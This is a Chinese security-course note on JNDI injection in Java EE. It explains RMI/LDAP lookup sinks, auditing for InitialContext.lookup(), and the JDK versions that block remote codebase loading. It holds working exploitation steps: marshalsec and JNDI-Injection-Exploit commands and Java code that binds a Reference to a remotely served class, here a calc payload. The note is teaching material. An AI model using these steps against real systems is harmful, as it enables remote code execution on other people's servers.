第47天:Web开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&DNS服务&高版本限制绕过

#知识点
1、安全开发-JavaEE-JNDI注入-LADP&RMI&DNS等

2、安全开发-JavaEE-JNDI注入-项目工具&手工原理等

|--------|--------------------------------------------------------|
| 协议 | 作用 |
| LDAP | 轻量级目录访问协议,约定了 Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容 |
| RMI | JAVA 远程方法协议,该协议用于远程调用应用程序编程接口,使客户机上运行的程序可以调用远程服务器上的对象 |
| DNS | 域名服务 |
| CORBA | 公共对象请求代理体系结构 |

思考明白:

什么是jndi注入

为什么有jndi注入

JDNI注入安全问题

JDNI注入利用条件

参考:https://blog.csdn.net/dupei/article/details/120534024

一、JNDI注入-RMI&LDAP服务

1、JNDI全称为 Java Naming and DirectoryInterface(Java命名和目录接口),是一组应用程序接口,为开发人员查找和访问各种资源提供了统一的通用接口,可以用来定义用户、网络、机器、对象和服务等各种资源。JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。

RMI:远程方法调用注册表

LDAP:轻量级目录访问协议

2、调用检索:

Java为了将Object对象存储在Naming或Directory服务下,提供了Naming Reference功能,对象可以通过绑定Reference存储在Naming或Directory服务下,比如RMI、LDAP等。javax.naming.InitialContext.lookup()

①在RMI服务中调用了InitialContext.lookup()的类有:

org.springframework.transaction.jta.JtaTransactionManager.readObject()

com.sun.rowset.JdbcRowSetImpl.execute()

javax.management.remote.rmi.RMIConnector.connect()

org.hibernate.jmx.StatisticsService.setSessionFactoryJNDIName(String sfJNDIName)

②在LDAP服务中调用了InitialContext.lookup()的类有:

InitialDirContext.lookup()

Spring LdapTemplate.lookup()

LdapTemplate.lookupContext()

总结:代码审计时,重点关注源码或者依赖jar包是否有类用到了InitialContext类,并调用了其中的lookup()方法,即InitialContext.lookup()->若lookup()中的参数可控rmi/ldap则可形成rce

三、JNDI工具注入(两款工具):

项目1:https://github.com/mbechler/marshalsec #工具使用

在当前目录用python创建一个网站

1、编译调用对象

javac calc.java ->生成calc.class文件

2、使用利用工具生成调用协议(rmi,ldap)

①LDAP:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Calc

->http://127.0.0.1:8888为启动的本地网站,Calc为编译生成的Calc.class文件的文件名

②RMI:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8888/#Calc

->http://127.0.0.1:8888为启动的本地网站,Calc为编译生成的Calc.class文件的文件名

3、将生成的Class存放访问路径

项目2:https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A xx.xx.xx.xx

四、JNDI注入手工:

//bind:将名称绑定到对象中;

//lookup:通过名字检索执行的对象;

//Reference类表示对存在于命名/目录系统以外的对象的引用。

//Reference参数:

//className:远程加载时所使用的类名;

//classFactory:加载的class中需要实例化类的名称;

//classFactoryLocation:远程加载类的地址,提供classes数据的地址可以是file/ftp/http等协议;

1、Server注册监听(服务端)

Registry registry = LocateRegistry.createRegistry(7778);

Reference reference = new Reference("calc", "calc", "http://127.0.0.1:8089/");

ReferenceWrapper wrapper = new ReferenceWrapper(reference);

registry.bind("RCE", wrapper);

启动起来端口8089

python启动本地网站监听8089

要执行命名Test文件的编译文件Test.class放到网站目录下

2、Clinet(客户端)连接触发

String uri = "rmi://127.0.0.1:7778/RCE";

InitialContext initialContext = new InitialContext();

initialContext.lookup(uri);

运行:

五、JDK高版本注入绕过:

这个版本指的运行这个Java程序运行的jdk版本号,不是在使用工具时,工具jar包需要的版本

JDK 6u45、7u21之后:

java.rmi.server.useCodebaseOnly的默认值被设置为true。当该值为true时,将禁用自动加载远程类文件,仅从CLASSPATH和当前JVM的java.rmi.server.codebase指定路径加载类文件。使用这个属性来防止客户端VM从其他Codebase地址上动态加载类,增加RMI ClassLoader安全性。

JDK 6u141、7u131、8u121之后:

增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。

JDK 6u211、7u201、8u191之后:

增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。

高版本绕过:

见后续Java安全篇章课程将讲到

总结:

1、知道JNID注入触发原理->代码审计时,重点关注源码或者依赖jar包是否有类用到了InitialContext类,并调用了其中的lookup()方法,即InitialContext.lookup()->若lookup()中的参数可控rmi/ldap则可形成rce

2、会使用两款工具JNDI-Injection-Exploit与marshalsec,以及手工注入

3、知道JDK高版本的JNDI注入rmi&ldap绕过

相关推荐
飛_3 小时前
解决VSCode无法加载Json架构问题
java·服务器·前端
木棉软糖6 小时前
一个MySQL的数据表最多能够存多少的数据?
java
程序视点6 小时前
Java BigDecimal详解:小数精确计算、使用方法与常见问题解决方案
java·后端
愿你天黑有灯下雨有伞7 小时前
Spring Boot SSE实战:SseEmitter实现多客户端事件广播与心跳保活
java·spring boot·spring
Java初学者小白7 小时前
秋招Day20 - 微服务
java
gx23488 小时前
HCLP--MGER综合实验
运维·服务器·网络
狐小粟同学8 小时前
JavaEE--3.多线程
java·开发语言·java-ee
angushine8 小时前
鲲鹏服务器部署Kafka2.8.1
运维·服务器
-XWB-8 小时前
【安全漏洞】防范未然:如何有效关闭不必要的HTTP请求方法,保护你的Web应用
服务器·网络·http
KNeeg_9 小时前
Spring循环依赖以及三个级别缓存
java·spring·缓存